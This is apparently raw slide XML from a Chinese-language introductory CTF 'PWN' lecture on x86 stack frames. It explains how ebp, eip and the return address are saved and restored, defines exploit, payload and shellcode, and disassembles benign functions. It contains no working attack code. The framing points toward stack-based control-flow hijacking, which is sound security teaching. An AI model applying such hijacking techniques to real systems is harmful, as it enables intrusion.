              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的指令地址存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器内，这样程序就可以依次执行被调用函数的指令了。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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看过了函数调用发生时的情况，就不难理解函数调用结束时的变化。变化的核心任务是丢弃被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态，并将栈顶恢复为调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的状态。</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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首先被调用函数的局部变量会从栈内直接弹出，栈顶会指向被调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>callee</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的基地址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4BEDC965-E6E6-4685-9ACE-9DB1A068BE59}"/>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7402887" y="1030820"/>
            <a:ext cx="4572638" cy="4525006"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DD0F8543-7244-4548-8DD9-705790DEACB2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7865630" y="5716709"/>
            <a:ext cx="3647152"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rPr>
              <a:t>将被调用函数的局部变量弹出栈外</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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789DDBCC-41FD-46FF-8E4F-9815B5D7C907}"/>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742813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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8BD08833-B5F9-48EE-A6B6-5A9414488AFD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="431912" y="2735514"/>
            <a:ext cx="6096000" cy="1200329"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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然后将基地址内存储的调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的基地址从栈内弹出，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器内。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（基地址）信息得以恢复。此时栈顶会指向返回地址。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{40C80AA8-108B-442D-A019-3047C6969377}"/>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7424413" y="1068045"/>
            <a:ext cx="4658375" cy="4258269"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F4E38BD6-CCA7-4B6A-B806-11DA690FC193}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7762611" y="5326314"/>
            <a:ext cx="3981977" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的基地址（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）弹出栈外，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>ebp </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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A4B9A076-914F-40E4-8C98-744258387406}"/>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4590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 name="矩形 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB9C875E-D211-4E66-B249-DF90D79401A3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="536619" y="2667951"/>
            <a:ext cx="6096000" cy="1477328"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>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再将返回地址从栈内弹出，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器内。这样调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="1A1A1A"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>（指令）信息得以恢复。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>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至此调用函数（</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>caller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>）的函数状态就全部恢复了，之后就是继续执行调用函数的指令了。</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="图片 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7115AB59-B4A3-4FBB-BE71-A367114B21AA}"/>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7340957" y="1372375"/>
            <a:ext cx="4591691" cy="3791479"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="矩形 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{388184CF-06F8-4F37-9B0A-7BB5D8CA5401}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7868863" y="5163854"/>
            <a:ext cx="3535877" cy="646331"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>将被调用函数的返回地址弹出栈外，并存到 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>eip </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>寄存器内</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" dirty="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>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8B3263A0-C094-4A6B-A50B-D31F9371A135}"/>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8498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8A2071F-F8D6-449D-AFBE-4E92757D2704}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2962141" y="2274838"/>
            <a:ext cx="5551520" cy="2031325"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-28575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exploit</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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用于攻击的脚本与方案</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payload</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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攻击载荷，是的目标进程被劫持控制流的数据</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shellcode</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="742950" lvl="1"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调用攻击目标的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>shell</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:latin typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑 Light" panose="020B0502040204020203" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>的代码</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="矩形 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{205DEE00-5020-4663-B178-6141E9161323}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="3265714" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">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PWN? | </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>一次简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>hack</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="5317394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6" name="Shape 236"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821995" y="4334704"/>
            <a:ext cx="4712800" cy="2256400"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>00000000 &lt;callee&gt;:</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0:   55          push   %ebp</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1:   89 e5       mov    %esp,%ebp</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3:   8b 55 08    mov    0x8(%ebp),%edx</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6:   8b 45 0c    mov    0xc(%ebp),%eax</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9:   01 c2       add    %eax,%edx</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b:   8b 45 10    mov    0x10(%ebp),%eax</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e:   01 d0       add    %edx,%eax</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10:   5d          pop    %ebp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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Consolas"/>
              <a:ea typeface="Consolas"/>
              <a:cs typeface="Consolas"/>
              <a:sym typeface="Consolas"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="237" name="Shape 237"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6821995" y="1340504"/>
            <a:ext cx="4712800" cy="3121200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="121900" tIns="121900" rIns="121900" bIns="121900" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="1219170">
              <a:buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
              <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>00000012 &lt;caller&gt;:</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12:   55              </a:t>
            </a:r>
            <a:r>
